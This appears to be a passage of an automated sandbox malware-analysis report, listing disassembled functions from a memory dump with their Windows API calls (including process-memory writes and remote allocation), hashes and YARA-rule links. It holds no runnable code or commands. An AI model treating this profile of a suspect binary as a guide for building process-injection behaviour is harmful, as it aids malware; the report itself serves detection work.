                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2664167353-0
                                                                                                                              • Opcode ID: 35bfed4d17f4a8007c5367a2f031490604acba61985aa46050e4c838c02957a3
                                                                                                                              • Instruction ID: 64246852d3080dd0c13921c8e90d616207c76aafc6eb176b97ddec80a4e277b3
                                                                                                                              • Opcode Fuzzy Hash: 35bfed4d17f4a8007c5367a2f031490604acba61985aa46050e4c838c02957a3
                                                                                                                              • Instruction Fuzzy Hash: 0411C432104706BFDF20BFA5AC81DAB7BA9EF55770B100429FA1886191EB31D80087A0
                                                                                                                              Function 001AB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 001AB903
                                                                                                                              • GetLastError.KERNEL32(?,001AB3CB,?,?,?), ref: 001AB90D
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,001AB3CB,?,?,?), ref: 001AB91C
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,001AB3CB), ref: 001AB923
                                                                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 001AB93A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 883493501-0
                                                                                                                              • Opcode ID: 1f58a2617ededcd25ec648effc3a0b00e376f9ace5956d648630becb6a67f13d
                                                                                                                              • Instruction ID: e40612c148238d41a0570400f86bfa897a8a5bae13f0605ddfa3df25b1513d96
                                                                                                                              • Opcode Fuzzy Hash: 1f58a2617ededcd25ec648effc3a0b00e376f9ace5956d648630becb6a67f13d
                                                                                                                              • Instruction Fuzzy Hash: D6011DB5205244BFDB115FA5EC88DBB3BAEEF8A768B100429F545C2151DB759C80DA60
                                                                                                                              Function 001B8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B8371
                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001B837F
                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001B8387
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001B8391
                                                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B83CD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2833360925-0
                                                                                                                              • Opcode ID: 26bfdeb1d42cfd0983cef7bbe0b47049be88b00400e3462952df92e8dd107183
                                                                                                                              • Instruction ID: 990f6648d16dcba6148f5196a1aa526a6b50734ff051e28c1efa47692945a0b4
                                                                                                                              • Opcode Fuzzy Hash: 26bfdeb1d42cfd0983cef7bbe0b47049be88b00400e3462952df92e8dd107183
                                                                                                                              • Instruction Fuzzy Hash: 7B012935D04619EBCF00AFA5ED48AFEBBB9FB08B01F010055E541B2160DF709594CBA2
                                                                                                                              Function 001AA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CLSIDFromProgID.COMBASE ref: 001AA874
                                                                                                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 001AA88F
                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 001AA89D
                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 001AA8AD
                                                                                                                              • CLSIDFromString.COMBASE(?,?), ref: 001AA8B9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3897988419-0
                                                                                                                              • Opcode ID: 003df2f7051e43831e3dbce08e71a5061f70f740579c3ff07f575f2ee3405ddb
                                                                                                                              • Instruction ID: 8a0d238f75a65c77243da7ee6092b86d42942dbc27c52149bcc931ad3b134c38
                                                                                                                              • Opcode Fuzzy Hash: 003df2f7051e43831e3dbce08e71a5061f70f740579c3ff07f575f2ee3405ddb
                                                                                                                              • Instruction Fuzzy Hash: 66018B7A600204AFDB104F68EC88BBABBAEEF45392F104028F905D2210D778DD81DBA1
                                                                                                                              Function 001AB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001AB7A5
                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001AB7AF
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001AB7BE
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 001AB7C5
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001AB7DB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 47921759-0
                                                                                                                              • Opcode ID: 60474c0b8637d868e8f11c8444ab4c14569defe3854e3516e6170c201104bb45
                                                                                                                              • Instruction ID: bb08f5381bd0a07a7cb656f42a7359f426147129c7de0e39d6be07e31ac12819
                                                                                                                              • Opcode Fuzzy Hash: 60474c0b8637d868e8f11c8444ab4c14569defe3854e3516e6170c201104bb45
                                                                                                                              • Instruction Fuzzy Hash: 4EF04FB52442446FEB101FA5ACC9E7B3BAEFF86755F104019FA45C7191DBA09C81DA60
                                                                                                                              Function 001AB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001AB806
                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001AB810
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001AB81F
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 001AB826
                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001AB83C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 47921759-0
                                                                                                                              • Opcode ID: 38940cd281e757affdcac902b74e43312d23463340ebfed04620033e85bc757f
                                                                                                                              • Instruction ID: a290046eb05ae106ff7386f662678ff15801e8ebde1bbdc50d3f038fab01c7b0
                                                                                                                              • Opcode Fuzzy Hash: 38940cd281e757affdcac902b74e43312d23463340ebfed04620033e85bc757f
                                                                                                                              • Instruction Fuzzy Hash: F2F04979204204AFEB211FA9FCC8E7B3B6EFF4A754F004029FA45C7152CB689881DA60
                                                                                                                              Function 001AFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 001AFA8F
                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 001AFAA6
                                                                                                                              • MessageBeep.USER32(00000000), ref: 001AFABE
                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 001AFADA
                                                                                                                              • EndDialog.USER32(?,00000001), ref: 001AFAF4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3741023627-0
                                                                                                                              • Opcode ID: e967c4e0804df7dcb057053291e667a969ad411c37e5cbed83ab9b096486b877
                                                                                                                              • Instruction ID: 87e080543a988ad0d512125447da4bbbf41a2b6a782bda58d990d6f4fcf80836
                                                                                                                              • Opcode Fuzzy Hash: e967c4e0804df7dcb057053291e667a969ad411c37e5cbed83ab9b096486b877
                                                                                                                              • Instruction Fuzzy Hash: 0F01A934500704ABEB249B50ED4EBF677B9BF01709F0401ADB14BA54E0DBF0A986CF40
                                                                                                                              Function 0018B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EndPath.GDI32(?), ref: 0018B526
                                                                                                                              • StrokeAndFillPath.GDI32(?,?,001EF583,00000000,?), ref: 0018B542
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0018B555
                                                                                                                              • DeleteObject.GDI32 ref: 0018B568
                                                                                                                              • StrokePath.GDI32(?), ref: 0018B583
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2625713937-0
                                                                                                                              • Opcode ID: 085b162d219420c01d25c1a530bd29913ad37a7384ff6ad1f3b8152279e7e2ed
                                                                                                                              • Instruction ID: a0152073d48b1e95ec3cdbaa7bd50a9c6bc0e1175e97b454e9ac4245dcb62f5b
                                                                                                                              • Opcode Fuzzy Hash: 085b162d219420c01d25c1a530bd29913ad37a7384ff6ad1f3b8152279e7e2ed
                                                                                                                              • Instruction Fuzzy Hash: F8F0C430109604ABEB156F25FD4CB797FE6AB01322F188215F4A9445F0CB348AA6DF18
                                                                                                                              Function 001BFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 001BFAB2
                                                                                                                              • CoCreateInstance.COMBASE(001FDA7C,00000000,00000001,001FD8EC,?), ref: 001BFACA
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • CoUninitialize.COMBASE ref: 001BFD2D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                              • String ID: .lnk
                                                                                                                              • API String ID: 2683427295-24824748
                                                                                                                              • Opcode ID: e98ef700266d86176c4aa92be53184d46148fa59c873b11ff23ade513f37e910
                                                                                                                              • Instruction ID: 8bf35bf061bb37f4785ae14fd1d2bee3ae1bc1d34efd79a616b4f219bb2afcf3
                                                                                                                              • Opcode Fuzzy Hash: e98ef700266d86176c4aa92be53184d46148fa59c873b11ff23ade513f37e910
                                                                                                                              • Instruction Fuzzy Hash: CAA14971504305AFC301EFA4C891EABB7EDEFA8714F40891CF55997192EB70EA09CB92
                                                                                                                              Function 0018DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #$+
                                                                                                                              • API String ID: 0-2552117581
                                                                                                                              • Opcode ID: 4ac122c8884b3e605e06035a2084a6c3f71b528f704264c49b0197911c814450
                                                                                                                              • Instruction ID: de97b15297f757ded4b0e49997caa65cba965370f3051d4f6f7aa9a198712cb1
                                                                                                                              • Opcode Fuzzy Hash: 4ac122c8884b3e605e06035a2084a6c3f71b528f704264c49b0197911c814450
                                                                                                                              • Instruction Fuzzy Hash: 76512F351047969FDF29EFA9E444AFE3BB4AF26310F244051F9919B2E0D7349E82CB20
                                                                                                                              Function 001B503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0020DC40,?,0000000F,0000000C,00000016,0020DC40,?), ref: 001B507B
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                                • Part of subcall function 0017B8A7: _memmove.LIBCMT ref: 0017B8FB
                                                                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001B50FB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                              • String ID: REMOVE$THIS
                                                                                                                              • API String ID: 2528338962-776492005
                                                                                                                              • Opcode ID: 529e21e2804dc0bdb540474888a576a0bd1a1d9059c45a461f00aeef34f1002c
                                                                                                                              • Instruction ID: 2b18c65a744431e0a3fa5072393f76d6b264ac0281799af1fd0a59228d0cf809
                                                                                                                              • Opcode Fuzzy Hash: 529e21e2804dc0bdb540474888a576a0bd1a1d9059c45a461f00aeef34f1002c
                                                                                                                              • Instruction Fuzzy Hash: FC417F35A00609AFCF05EF58C881BEEB7B6FF58314F048069E95AAB252DB74DD41CB51
                                                                                                                              Function 001ACF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001AC9FE,?,?,00000034,00000800,?,00000034), ref: 001B4D6B
                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001ACFC9
                                                                                                                                • Part of subcall function 001B4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001ACA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 001B4D36
                                                                                                                                • Part of subcall function 001B4C65: GetWindowThreadProcessId.USER32(?,?), ref: 001B4C90
                                                                                                                                • Part of subcall function 001B4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001AC9C2,00000034,?,?,00001004,00000000,00000000), ref: 001B4CA0
                                                                                                                                • Part of subcall function 001B4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001AC9C2,00000034,?,?,00001004,00000000,00000000), ref: 001B4CB6
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001AD036
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001AD083
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                              • Opcode ID: ef9b48b719abed919f881542a7a90f6d63117f0c7ddd700d55d18dfc824fb3f8
                                                                                                                              • Instruction ID: 398729063d3d5d8dc9b4428cc643ae93d297720ccf9329275bf641d6122e9308
                                                                                                                              • Opcode Fuzzy Hash: ef9b48b719abed919f881542a7a90f6d63117f0c7ddd700d55d18dfc824fb3f8
                                                                                                                              • Instruction Fuzzy Hash: 4F412A76900218AFDB10DFA4DD85AEEBBB8AF59700F108095FA45BB181DB706E85CB61
                                                                                                                              Function 001DA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0020DBF0,00000000,?,?,?,?), ref: 001DA4E6
                                                                                                                              • GetWindowLongW.USER32 ref: 001DA503
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001DA513
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long
                                                                                                                              • String ID: SysTreeView32
                                                                                                                              • API String ID: 847901565-1698111956
